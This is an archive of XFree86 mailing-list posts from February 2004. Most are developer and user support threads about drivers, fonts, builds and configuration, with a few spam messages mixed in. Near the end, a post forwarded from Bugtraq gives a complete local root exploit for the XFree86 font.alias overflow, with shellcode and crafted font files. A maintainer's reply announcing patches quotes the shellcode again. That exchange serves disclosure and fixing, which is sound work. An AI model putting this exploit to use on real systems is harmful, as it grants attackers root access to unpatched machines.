Screenshots

2004-02-12 Thread Rychkov, Alexey
Hello!

There is such task:
I need to capture screenshots and store its in a memory ASAP (really, I need only 
array of data RGBA). 
I was doing that with help of XGetImage - but it works too slow;
After that I was trying to create XPixmap and copy screen content to it, but I 
discovered that Pixmap always changes according to the screen.
How can I create Pixmap and don't let X11 change its content? Or maybe exists some 
other solution.

Thanks.

___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: Screenshots

2004-02-12 Thread Mark Vojkovich
On Thu, 12 Feb 2004, Rychkov, Alexey wrote:

 Hello!
 
 There is such task:
 I need to capture screenshots and store its in a memory ASAP (really, I need only 
 array of data RGBA). 
 I was doing that with help of XGetImage - but it works too slow;

   If it is for use locally (not over a network), then the shared
memory version XShmGetImage is faster.  Note however, that GetImage
operations are inherently slow with most graphics drivers.


 After that I was trying to create XPixmap and copy screen content to it, but I 
 discovered that Pixmap always changes according to the screen.

   I don't understand what you mean by that.

 How can I create Pixmap and don't let X11 change its content? Or maybe exists some 
 other solution.


Mark.

___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


SiS driver

2004-02-12 Thread Kean Johnston
All,

Is there any reason why the SiS driver isnt the one Thomas Winischofer 
provides on his site? I recently had very negative experiences with the 
stock SiS driver on a 661FX that his driver solved immediately. Now I 
realized it may have solved just this one problem but it seems as the 
one on his site gets more attention. I know Thomas has submitted other 
fixes into the tree, and may even be the SiS maintainer.

Kean
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: SiS driver

2004-02-12 Thread Alex Deucher
--- Kean Johnston [EMAIL PROTECTED] wrote:
 All,
 
 Is there any reason why the SiS driver isnt the one Thomas
 Winischofer 
 provides on his site? I recently had very negative experiences with
 the 
 stock SiS driver on a 661FX that his driver solved immediately. Now I
 
 realized it may have solved just this one problem but it seems as the
 
 one on his site gets more attention. I know Thomas has submitted
 other 
 fixes into the tree, and may even be the SiS maintainer.
 

Thomas is the Sis maintainer and he updates the sis driver in xfree86
cvs regularly. They are the same driver for the most part.  The changes
he makes usually find their way into xfree86 within a day of two of him
adding them. if you are using an older release of xfree86, then the
driver is not as up to date as what's in xfree86 cvs or on Thomas'
site.

Alex

 Kean


__
Do you Yahoo!?
Yahoo! Finance: Get your refund fast by filing online.
http://taxes.yahoo.com/filing.html
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: DocBook pre-Release Notes

2004-02-12 Thread georgina o. economou
Yep I see that the double comma is gone but now there's a space between the name and 
comma.  So a typical line in the credits section looks like:

General Integration of Submissions:
Egbert Eich , David H. Dawes , Ivan Pascal , Alan Hourihane , Matthieu Herrb

Was that the intent?





___
Join Excite! - http://www.excite.com
The most personalized portal on the Web!
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


XOpenDisplay for new X Windows Programmer.

2004-02-12 Thread Rick Dempster
Hi,

First question:  Am I in the right place.  I am trying to write a
simple X Window program but XFee86 seems to focus on video cards or
chips.  So, if I'm not in the right place please tell me where to go but
not like my wife does.

If this is the place, I am starting into X Window programming and I
can't even get the simplest program to run.  It compiles and links fine
but always fails to make the connection to the display manager.  I have
spent 2 days pouring over the internet and trying all sorts of stuff but
nothing has worked.

I'm running RedHat 9.0 with XFree86 4.3 on an Intel clone.  Here is my
program:

#include stdio.h
#include X11/X.h
#include X11/Xlib.h

/*MAIN**/
int main(int argc, char *argv[]) {
 
  Display   *disp;
  int   screen = -1;

//Open the X Windows Display
  disp = XOpenDisplay(localhost:0.);

  if (disp == NULL){
printf(Error opening X Display);
return(-1);
  }
  screen = DefaultScreen(disp);
  printf(The default screen is: %d \n,screen);

  if (disp) {
XCloseDisplay(disp);
disp = 0;
  }
}


I have tried (NULL), (Cody:0), (Cody:0.0) and (Cody:0.1) as args
to XOpenDisplay.  But it never returns any but NULL and I never get what
the screen number is.  

I'm starting to think it's a RedHat problem or an enviroment problem. 
I also have xhost + set.

So at this point I am very frustrated with X Windows! :)

Thanks is advance to all.

Sincerely,
Rick Dempster
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: XOpenDisplay for new X Windows Programmer.

2004-02-12 Thread Mark Vojkovich
On Thu, 12 Feb 2004, Rick Dempster wrote:

 Hi,
 
 First question:  Am I in the right place.  I am trying to write a
 simple X Window program but XFee86 seems to focus on video cards or
 chips.  So, if I'm not in the right place please tell me where to go but
 not like my wife does.
 
 If this is the place, I am starting into X Window programming and I
 can't even get the simplest program to run.  It compiles and links fine
 but always fails to make the connection to the display manager.  I have
 spent 2 days pouring over the internet and trying all sorts of stuff but
 nothing has worked.
 
 I'm running RedHat 9.0 with XFree86 4.3 on an Intel clone.  Here is my
 program:
 
 #include stdio.h
 #include X11/X.h
 #include X11/Xlib.h
 
 /*MAIN**/
 int main(int argc, char *argv[]) {
  
   Display *disp;
   int screen = -1;
 
 //Open the X Windows Display
   disp = XOpenDisplay(localhost:0.);
 
   if (disp == NULL){
 printf(Error opening X Display);
 return(-1);
   }
   screen = DefaultScreen(disp);
   printf(The default screen is: %d \n,screen);
 
   if (disp) {
 XCloseDisplay(disp);
 disp = 0;
   }
 }
 
 
 I have tried (NULL), (Cody:0), (Cody:0.0) and (Cody:0.1) as args
 to XOpenDisplay.  But it never returns any but NULL and I never get what
 the screen number is.  


   Generally, you pass NULL so it will read the connection from
the DISPLAY environment variable.  Most shells have this set to
a reasonable default like :0.0 .  


Mark.


___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: DocBook pre-Release Notes

2004-02-12 Thread John Himpel
On Thu, 2004-02-12 at 19:30 -0500, georgina o. economou wrote:
 Yep I see that the double comma is gone but now there's a space between the name and 
 comma.  So a typical line in the credits section looks like:
 
 General Integration of Submissions:
 Egbert Eich , David H. Dawes , Ivan Pascal , Alan Hourihane , Matthieu Herrb
 
 Was that the intent?

No, but that was the effect.
I just re-published without the space preceding the comma.

If you want the semi-colons that are in the subsections removed, I can
easily do that too.  I just reproduced the original.  But I agree that
it does look a bit odd.

John

___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


A error when compiling XFree864.2 on SELS 8.2 on AMD64 system

2004-02-12 Thread Yukun Chen
Hi All

For some reasons, I have to compile XFree864.2 on SELS 8.2(64bit) with 
AMD64bit CPU. But when I run make WorldWorld.log on the specific dir, I just get 
the error 

message in my World.log file as follows:

gcc: cannot specify -o with -c or -S and multiple compilations
make[2]: ** [imake.o] Error 1
make[2]: Leaving directory '/xfree86420_release/config/imake
make[1]: *** [imake.bootstrap] Error 2
make[1]: Leaving directory '/xfree86420_release'
make: *** [World] Error 2

The XFree864.2 source packages are gotten from xfree86.org and can be built 
successfully on other OS such as Redhat. Also, I have ever tried the latest code of 
XFree864.2 

but failed to achieve. Meanwhile, I searched for it in google but the way taught in 
such articles dosenot work. Finally , the version of gcc is 3.3

Can anybody be kind to give some ideas for it? 

Thanx a lot.

bst.,rgds
Yukun




___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: DocBook pre-Release Notes

2004-02-12 Thread georgina o. economou
Yeah I just went and looked.  

General Integration of Submissions:
Egbert Eich, David H. Dawes, Ivan Pascal, Alan Hourihane, Matthieu Herrb

Perfect!

I'd get rid of those semis; they look simply awful.  I'll look some more.  Thanks 
though for being so prompt with this.
  


 --- On Thu 02/12, John Himpel  [EMAIL PROTECTED]  wrote:
From: John Himpel [mailto: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED]
Date: Thu, 12 Feb 2004 20:22:08 -0600
Subject: Re: DocBook pre-Release Notes

I just re-published without the space preceding the comma.

If you want the semi-colons that are in the subsections removed, I can easily do that 
too.  I just reproduced the original.  But I agree that it does look a bit odd.
John

___
Join Excite! - http://www.excite.com
The most personalized portal on the Web!
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


trivial patch for startx.cpp

2004-02-12 Thread Tyler Retzlaff
Everywhere else XCOMM start at col 0 except for startx.cpp (change
since xf43).  Request that the following trivial patch be applied 
to make startx.cpp XCOMM usage consistent with the rest of tree.

Thanks!

Index: startx.cpp
===
RCS file: /cvs/xc/programs/xinit/startx.cpp,v
retrieving revision 3.18
diff -u -p -r3.18 startx.cpp
--- startx.cpp  22 Aug 2003 19:27:33 -  3.18
+++ startx.cpp  13 Feb 2004 06:28:27 -
@@ -82,7 +82,7 @@ fi
 whoseargs=client
 while [ x$1 != x ]; do
 case $1 in
-XCOMM '' required to prevent cpp from treating /* as a C comment.
+XCOMM '' required to prevent cpp from treating /* as a C comment.
 /''*|\./''*)
if [ $whoseargs = client ]; then
if [ x$clientargs = x ]; then

-- 

Tyler R. Retzlaff [EMAIL PROTECTED] http://www.NetBSD.org
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: [Fonts] freetype module sometimes gets font height (descent?) wrong

2004-02-12 Thread Chisato Yamauchi
From: Michael Lampe [EMAIL PROTECTED]
Subject: [Fonts] freetype module sometimes gets font height (descent?) wrong
Date: Sun, 08 Feb 2004 20:00:25 +0100

 Try once with freetype and once with xtt loaded:
 
 emacs -fn
   -monotype-courier new-medium-r-normal--13-0-100-100-m-0-iso8859-1
 
 With freetype it looks like double-spaced. With xtt it's ok.
 
 This is with current cvs, 4.3 and probably before.

  I've tested using cour.ttf(included in WindowsNT), but
I cannot reproduce the problem.  There are no differences 
between xtt and freetype with current cvs.

  What font do you use?


Chisato Yamauchi
___
Fonts mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/fonts


[I18n] Sp-ecial Offer! 60% off Gen-eric V(i)agra

2004-02-12 Thread Yolanda Bolton
concession
Get ge:neric [EMAIL PROTECTED] fo:r as 1ow as $2.50 per 50 mg
globe
LOW-COST [EMAIL PROTECTED]
j
Now you can get generic [EMAIL PROTECTED] for as low as $2.50 per dose,
with a FR|EE physician's consultation and discrete shipment to the
privacy of your home or office.
a
Costs over 60% less than Brand Name
FR|EE Doctor Consultation
FR|EE Shipp|ing
Private delivery to your home
100% M|oney Back G|uarantee
u
FUL|L RE|FUND IF NOT DELIGHTED!
q
Please Visit The Site Below For More Information
http://www.realeds.com/xm/

n
peltry hadley shiny riverine edifice rheum debug iron cottrell ecumenic autocratic 
yodel collar hellfire haze thousandfold douglass iodinate superposable darpa soften 
czechoslovakia cognizant cornmeal dairymen indiscernible conflagration property 
savoyard apocryphal smithson  


Re: [XFree86] problem with modelines

2004-02-12 Thread Thomas Winischhofer
Andreas van Leeuwen Flamino wrote:

On Wed, Feb 11, 2004 at 11:22:30AM -0800, Mark Vojkovich wrote the following (indented);

  We need to see the /var/log/XFree86.0.log file. 

			Mark.



I have attached it to this message.
You are using depth 8 for which there is no Display SubSection in the 
config file you sent previously.

(==) R128(0): Depth 8, (==) framebuffer bpp 8
(II) R128(0): Pixel depth = 8 bits stored in 1 byte (8 bpp pixmaps)
Insert for example

	DefaultDepth 16

before the first Display subsection.

Thomas

--
Thomas Winischhofer
Vienna/Austria
thomas AT winischhofer DOT net  *** http://www.winischhofer.net/
twini AT xfree86 DOT org


___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] about multiple desktops

2004-02-12 Thread Aivils . Stoss
 Hello all
 I want to know that providing multiple desktops is the
 feature of X server or it is of window manager.

About radical changes You can read here:

http://www.tldp.org/HOWTO/XFree-Local-multi-user-HOWTO/
http://startx.times.lv/

I think multiple desktops equals multiple local users.
You can build station with 4 monitors-keyboards-mice,
which runs under Linux-XFree86.

Aivils Stoss

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] nvidia and ut2003 - wrong refresh rates

2004-02-12 Thread Aivils . Stoss
I'm trying to run ut2003 under linux with an nvidia driver, but
everytime I start the game it switches to 800x600 @ 56 Hz, altough my
monitor does support 1024x768 @ 85 Hz, and 800x600 @ 100 Hz (which I
can not set up under X, because it alway switches to [EMAIL PROTECTED] Hz, but
this doesn't matter now). So anyone else experiencing this strange
refresh rate with nvidia driver while gaming? How could this be fixed?
In my console, when running ut2003, I also get these messages:

Please check out file:
/etc/X11/XF86Config-4
and edit monitor Vertical refresh line
Standard:
VertRefresh 59-87
After editing:
VertRefresh 84-87
which means only refresh betwin 84 in 87 Hz.
Unfortunately i do not know how to change refresh on fly, which
feature is supported by XFree86.

Xlib:  extension XiG-SUNDRY-NONSTANDARD missing on display :0.0.
Xlib:  extension XiG-SUNDRY-NONSTANDARD missing on display :0.0.
Xlib:  extension XiG-SUNDRY-NONSTANDARD missing on display :0.0.

http://www.icculus.org/lgfaq/#launcheveryxig

Aivils Stoss

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] How to speed up XFree86 startup on ARM-Linux

2004-02-12 Thread Pier Paolo Glave
Hi all,

I'm trying to use XFree86 4.3.0 on an embedded system
based on ARM9 core running at 200 MHz, with a
graphical card connected on the PCI bus (for the first
trials I'm using a Matrox Millennium II, and then I'm
going to switch to a custom hardware). I'm running
Linux 2.4.18.
I crosscompiled the full XFree86 version, and not the
tiny one, because I need to use the modular drivers
(such as mga_drv.o) for graphical accelerations.

I succeeded in running the X server on my system, but
the server startup time is quite high: if launched
soon after the system boot, X -probeonly  takes
about 16 seconds to terminate.

I suspect that most of this time could be spent by CPU
for file accesses: e.g. loading modules, or writing
the logfile.

The following points drive me to this suspicion:
1. I have a JFFS2 filesystem on a flash memory. This
filesystem is compressed, and moreover it uses some
algorithms to avoid insisting on the same flash sector
and to make garbage collection: therefore, it can be
heavy for the CPU if a lot of files are accessed, as
in the case of XFree86.
2. If I launch X -probeonly several times
consecutively, the execution times vary a lot, ranging
from 10 to 20 seconds. I think this huge variation can
be the effect of file caching and/or JFFS2 processing.

I made some attempts to reduce the file access time,
in this way:
1. Using a RAM filesystem (tmpfs) to store all the
/usr/X11R6 stuff (modules) and changing the
configuration file to load modules from there. Result:
no meaningful change.
2. Changing the logfile position with the -logfile
option. I tried using /dev/null, and using a path
located in a tmpfs filesystem, but in both cases the
X server aborts with signal 4.

I wanted to ask you what problem can I have with
-logfile to cause the server abort, and if you have
some better ideas that could speed up the server
startup.

Sorry for the long post and thanks in advance.
--
Pier Paolo Glave



__
Do you Yahoo!?
Yahoo! Finance: Get your refund fast by filing online.
http://taxes.yahoo.com/filing.html
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Problem with ATI Radeon 9200SE

2004-02-12 Thread Tsvigun Dmitry
I have AGP ASUS ATI Radeon 9200SE.
What value of ChipID I must set up?

[EMAIL PROTECTED]

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] Accepting external USB-mouse without restart

2004-02-12 Thread NUKE THEM
Am Mittwoch, 11. Februar 2004 16:12 schrieb L. Jensen:
 On Wednesday 11 February 2004 04:35 am, NUKE THEM wrote:
  I'd like to be able to plug in my external USB-mouse and use it without
  restarting X. Is this possible?

 Yes, I have it working on my system.  Besides the two InputDevice sections
 you posted, you may need to change your ServerLayout section to something
 like what's below.  The other key ingredient is to make sure that all the
 modules needed for the usb mouse are loaded before X starts.  Otherwise,
 you may see an error in the log when the server tries to open the device. 
 The list of modules I use is below.

 Best
 L. Jensen

 Section ServerLayout
 Identifier  Layout[0]
 Screen  Screen[0]
 InputDevice GenericKeyboard CoreKeyboard
 InputDevice SynapticsTouchPad CorePointer
 InputDevice USBWheelMouse SendCoreEvents
 EndSection

 MODULES_LOADED_ON_BOOT= usb-uhci input evdev mousedev hid 

Didn't help with Linux 2.4 but I just upgraded to 2.6 and now it works. Weird, 
as much as I know the USB-System didn't change. 

Anyway, thanks a lot for your answer.

LLAP

Patrick 

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] XFREE86 on THE LAST DELL LATITUDE D505

2004-02-12 Thread c_goze
Hi
my laptop latitude d505 with a i855GME chipset is not working at all I
tried two distributions SUSE 9 PRO or RedHat 9.0


with RH90 distribution I cannot install the system from graphical
environment, only text.

with SUSE 9.0 PRO the graphical modes is working fine, frame buffer seems to
work with the 3 available screen size. but the last step of installation
fails when the XFree86 driver is used !
during the boot the penguin is there in the upper-left corner (frame
buffer is ok) but when the startx runs, all the machine freezes at the
screen starts to get green  CTRL+ALT +DEL is the last chance I have to
do something

LAST INFORMATION
I have a dual boot with XP PRO, the graphics board works fine, it is not
damaged
*


Hope you can really help me, Christophe


XFREE.tar
Description: Unix tar archive


Re: [XFree86] Screen not found

2004-02-12 Thread Michael Taylor
Youssef Aoun wrote:
  
 The server cannot Identify my screen, please help.

...

 XFree86 Version 4.1.0.1 / X Window System
 (protocol Version 11, revision 0, vendor release 6510)
 Release Date: 21 December 2001
   If the server is older than 6-12 months, or if your card is
   newer than the above date, look for a newer version before
   reporting problems.  (See http://www.XFree86.Org/FAQ)
...

Please update to XFree86 4.3.0 first, or try the latest pre-release of 4.4.0 RC2.

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] your size Date Number579903

2004-02-12 Thread galiraba
drop the hammer on the next girl you screw...

http://www.touchd4d.com/vp5




















No more of this sort of material. Honoured in 24-48 hours.
http://amanuensis.amilsdcx.com/a.html
 


brushlike actinium insipid ripen gao lock laura fletcher coagulable keller oregon 
paraboloidal coin impale 
th





___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] XFREE86 on THE LAST DELL LATITUDE D505

2004-02-12 Thread Christopher Thom
Quoth [EMAIL PROTECTED]:

 with RH90 distribution I cannot install the system from graphical
 environment, only text.

You need a VideoRam line in you XF86Config file to tell the driver how
much system memory to use.  try adding
VideoRam8192

to your Device section.
I'd also recommend runnin in 16bit colour. There can be problems with the
i855 in 24 bit (gets unstable when VT-switching) and there is no hw
accceleration in 24bit mode AFAIK.

cheers
chris
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] mouse pointer problems

2004-02-12 Thread jimmy a. ford
Hello,
I am using 7.1 Red Hat Linux with the 4.0.3-5 version of XFree86. I
recently had to change my video card in my server. When I did something
in the configuration got messed up.  I've been searching  for the
solution in the documentation but had no success.

THE PROBLEM:

When the XSERVER starts up, it does not show the mouse pointer. It shows
a distorted square  box. The mouse does move the box fine. To select an
option from the screen, i'll have put the top right corner of the box on
the object, then select it. Everything seems to work fine except for the
box being on the screen and not the pointer arrow picture.

Can you tell me where I can fine the configuration file that handles
this process and the (i guess) arrow bit map file.

Thank you,
JAF

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Problem with AGP ASUS ATI Radeon 9200SE

2004-02-12 Thread Tsvigun Dmitry
I have AGP ASUS ATI Radeon 9200SE.
What value of ChipID I must set up?

[EMAIL PROTECTED]

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] CT 69000 and TV

2004-02-12 Thread Nicolas MARC
Hi!

Did anyone succedeed to use a TV output on a CT 69000 based card?
I know my card works well under Windows. But I'd like to switch to
LinuxXFree86.
Thanks a lot, I would really interested in making this thing work!

Cheers,

Nico




___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] CT 69000 and TV

2004-02-12 Thread David Bateman
I don't believe there is any intrinsic support for TV-out in the 69000,
so TV out is probably implemented with components external to the 69000.
Therefore without knowing what these components are, it is not possible
to implement TV out support.

In any case I know there is no TV out support in the current XFree driver.

D.



Daprès Nicolas MARC [EMAIL PROTECTED] (le 12/02/2004):
 Hi!
 
 Did anyone succedeed to use a TV output on a CT 69000 based card?
 I know my card works well under Windows. But I'd like to switch to
 LinuxXFree86.
 Thanks a lot, I would really interested in making this thing work!
 
 Cheers,
 
 Nico
 
 
 
 
 ___
 XFree86 mailing list
 [EMAIL PROTECTED]
 http://XFree86.Org/mailman/listinfo/xfree86

-- 
David Bateman[EMAIL PROTECTED]
Motorola CRM +33 1 69 35 48 04 (Ph) 
Parc Les Algorithmes, Commune de St Aubin+33 1 69 35 77 01 (Fax) 
91193 Gif-Sur-Yvette FRANCE

The information contained in this communication has been classified as: 

[x] General Business Information 
[ ] Motorola Internal Use Only 
[ ] Motorola Confidential Proprietary
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Error de Xfree86

2004-02-12 Thread Enzo Labruzzo
Buenas Tardes

Actualmente tengo problemas con mi drivers de video la maquina es Marca: 
Dell, Modelo: GX270 Optiplex.

Este es el error que me da: Fatal server error
no screens found

Si me pueden ayudar se lo agradezco

Gracias

Defensoria del Pueblo
Dirección de Informatica
Enzo La Bruzzo
Administrador de Redes
Tlf./Fax 0212.5783440
Celular: 0412.9944674
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Questions about fonts

2004-02-12 Thread Scharf Yuval
Hello,

I would like to improve my knowledge about fonts in Linux.
Can some one point me to a document/web site/book that will help me in
that. A few questions which I'm asking myself appear below my signature.

Thanks,
Yuval Scharf

Should I use a font server or not?
what are my options?

How do the
-adobe-helvetica-medium-r-normal--10-100-75-75-p-56-iso8859-10
notion used by xfontsel and the Helvetica(10) notion used by applications
relate?

How does an application knows which fonts are installed?
How can I monitor which fonts the application asks for and what response
does it get from X server?

How fonts and encodings relate to each other?

What tools can I use to monitor fonts staff?



___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Matrox G450 Video Card

2004-02-12 Thread Nestor Roldan
Dear Linux friends ,
We need to install the G450  Matrox Video Card on 7.0 Linux Mandrake and the
library doesn`t have it , My  current system have a G200 video card but it
need replacement , The supplier doesn`t  have the G200 anymore , and the
G450 is the only option .We need the G450 driver for my current linux
version and the way for install it .

Regards

Nestor Roldan
Head Lab Technologist
Computalog S.A
Argentina - Santa Cruz
PH:+542974850019
FX:+542974850020
[EMAIL PROTECTED]
- Original Message -
From: Christopher Thom [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Thursday, February 12, 2004 12:35 PM
Subject: Re: [XFree86] XFREE86 on THE LAST DELL LATITUDE D505


 Quoth [EMAIL PROTECTED]:

  with RH90 distribution I cannot install the system from graphical
  environment, only text.

 You need a VideoRam line in you XF86Config file to tell the driver how
 much system memory to use.  try adding
 VideoRam8192

 to your Device section.
 I'd also recommend runnin in 16bit colour. There can be problems with the
 i855 in 24 bit (gets unstable when VT-switching) and there is no hw
 accceleration in 24bit mode AFAIK.

 cheers
 chris
 ___
 XFree86 mailing list
 [EMAIL PROTECTED]
 http://XFree86.Org/mailman/listinfo/xfree86

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] Questions about fonts

2004-02-12 Thread Jon Niehof
 I would like to improve my knowledge about fonts in
 Linux.
 Can some one point me to a document/web site/book
 that will help me in
 that. A few questions which I'm asking myself appear
 below my signature.
A good place to start is the XF86 Font De-uglification
HOWTO: http://feenix.burgiss.net/ldp/fdu/

__
Do you Yahoo!?
Yahoo! Finance: Get your refund fast by filing online.
http://taxes.yahoo.com/filing.html
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Status for i855GM and 1400x1050?

2004-02-12 Thread Odd Christer Brovig
What is the status for this chipset and resolution? Will it work native 
in 4.4.0?
I've had no success of getting the mode up and running in both 4.3.0 
with 855patch and 4.4.0 rc2(installed from binaries provided by 
xfree86.org).

Regards, Odd Christer Brovig.

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Francisco

2004-02-12 Thread Cruz
image/jpeg img src=cid:ERROR: Option 'cid' not defined for attach #1, define it





[XFree86] Dale

2004-02-12 Thread Samuel
image/jpeg img src=cid:ERROR: Option 'cid' not defined for attach #1, define it





Re: [XFree86] Matrox G450 Video Card

2004-02-12 Thread Michael Taylor
Nestor Roldan wrote:
 Dear Linux friends ,
 We need to install the G450  Matrox Video Card on 7.0 Linux Mandrake and the
 library doesn`t have it , My  current system have a G200 video card but it

The Matrox G450 is supported in XFree86 4.1.0 using the 'mga' driver and newer
(the current release is 4.3.0, and 4.4.0 pre-release is available).

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Intel 845-G problems

2004-02-12 Thread Björn Wikström
Hey!

I've just installed Slackware 9.1 and now I'm having trouble with the 
X-configuration. I have the Intel 845-G video card and as far as I know 
the drivers for this card is in the i810-driver package? When I'm 
running the 'xf86config' I put in all the correct values for my card, 
mouse and whatever, but still I get the errors saying something about 
the BIOS and depth is not correct. I'm pretty new to Slack and Linux in 
general, so if someone could give me an step-by-step HOWTO I would 
really glad. :)

Thanks in advance and regards,
bjornie
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] hiaa cheap vaiagra azixa.

2004-02-12 Thread hiecamg lioaaro



Hello isuef panur lfa!
One Timedicsuontorder for
cehpaest vaiagra.For more info open atathced file.




[XFree86] Fwd: XFree86 vulnerability exploit

2004-02-12 Thread Scott Gifford
This was posted on Bugtraq earlier today, and I thought it might be of
interest here.


From: Bender [EMAIL PROTECTED]
Subject: XFree86 vulnerability exploit
To: [EMAIL PROTECTED]
Date: Wed, 11 Feb 2004 11:09:00 +

Hello

Below you can find a exploit for latest bug in XFree86 sofware.
Tested on some versions of RedHat Linux (mainly 7.0).

regards
Bender

/* For educational purposes only*/
/* Brought to you by [EMAIL PROTECTED]   11.10.2004  */

#include fcntl.h

#define NOPNUM 8000
#define ADRNUM 1058

/* shellcode from LSD */
char setuidcode[]= /* 8 bytes*/
\x33\xc0 /* xorl%eax,%eax  */
\x31\xdb /* xorl%ebx,%ebx  */
\xb0\x17 /* movb$0x17,%al  */
\xcd\x80 /* int $0x80  */
;

char shellcode[]=  /* 24 bytes   */
\x31\xc0 /* xorl%eax,%eax  */
\x50 /* pushl   %eax   */
\x68//id   /* pushl   $0x68732f2f*/
\x68/tmp   /* pushl   $0x6e69622f*/
\x89\xe3 /* movl%esp,%ebx  */
\x50 /* pushl   %eax   */
\x53 /* pushl   %ebx   */
\x89\xe1 /* movl%esp,%ecx  */
\x99 /* cdql   */
\xb0\x0b /* movb$0x0b,%al  */
\xcd\x80 /* int $0x80  */
;

char jump[]=
\x8b\xc4/* movl   %esp,%eax   */
\xc3/* ret*/
;


main(int argc,char **argv){
char buffer[2],adr[4],pch[4],*b,*envp[4];
int i,fd;


*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+16000;

envp[0]=buffer[2000];
envp[1]=0;

printf(adr: 0x%x\n,adr+12000);

b=buffer;
strcpy(buffer,1\n);
strcat(buffer,.pcf 
--fixed-small-a-semicondensed--1-1-1-1-a-1-iso-1\n);
fd=open(/tmp/fonts.dir,O_CREAT|O_WRONLY,0666);
write(fd,buffer,strlen(buffer));

for(i=0;iADRNUM;i++) *b++=adr[i%4];
*b++='\n';

fd=open(/tmp/fonts.alias,O_CREAT|O_WRONLY,0666);
write(fd,buffer,strlen(buffer));
close(fd);

b=buffer[2000];

for(i=0;iNOPNUM-strlen(setuidcode)-strlen(setuidcode)-strlen(shellcode);i++) 
*b++=0x90;
for(i=0;istrlen(setuidcode);i++) *b++=setuidcode[i];
for(i=0;istrlen(shellcode);i++) *b++=shellcode[i];
*b=0;

execle(/usr/bin/X11/X,X,:0,-fp,/tmp,0,envp);
}

 -- 
[EMAIL PROTECTED]
SDF Public Access UNIX System - http://sdf.lonestar.org
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] Fwd: XFree86 vulnerability exploit

2004-02-12 Thread David Dawes
Patches for this and related vulnerabilities have been committed
to all of the release branches of the XFree86 CVS repository, and
to the trunk.  A source patch relative to 4.3.0.1 can be found at
ftp://ftp.xfree86.org/pub/XFree86/4.3.0/fixes/fontfile.diff.

Once things have settled, I'm planning to add snapshot tags to each
branch. This will give a set of definite version numbers where this
is fixed.

David
-- 
http://www.XFree86.org/~dawes

On Thu, Feb 12, 2004 at 04:50:51PM -0500, Scott Gifford wrote:
This was posted on Bugtraq earlier today, and I thought it might be of
interest here.


From: Bender [EMAIL PROTECTED]
Subject: XFree86 vulnerability exploit
To: [EMAIL PROTECTED]
Date: Wed, 11 Feb 2004 11:09:00 +

Hello

Below you can find a exploit for latest bug in XFree86 sofware.
Tested on some versions of RedHat Linux (mainly 7.0).

regards
Bender

/* For educational purposes only*/
/* Brought to you by [EMAIL PROTECTED]   11.10.2004  */

#include fcntl.h

#define NOPNUM 8000
#define ADRNUM 1058

/* shellcode from LSD */
char setuidcode[]= /* 8 bytes*/
\x33\xc0 /* xorl%eax,%eax  */
\x31\xdb /* xorl%ebx,%ebx  */
\xb0\x17 /* movb$0x17,%al  */
\xcd\x80 /* int $0x80  */
;

char shellcode[]=  /* 24 bytes   */
\x31\xc0 /* xorl%eax,%eax  */
\x50 /* pushl   %eax   */
\x68//id   /* pushl   $0x68732f2f*/
\x68/tmp   /* pushl   $0x6e69622f*/
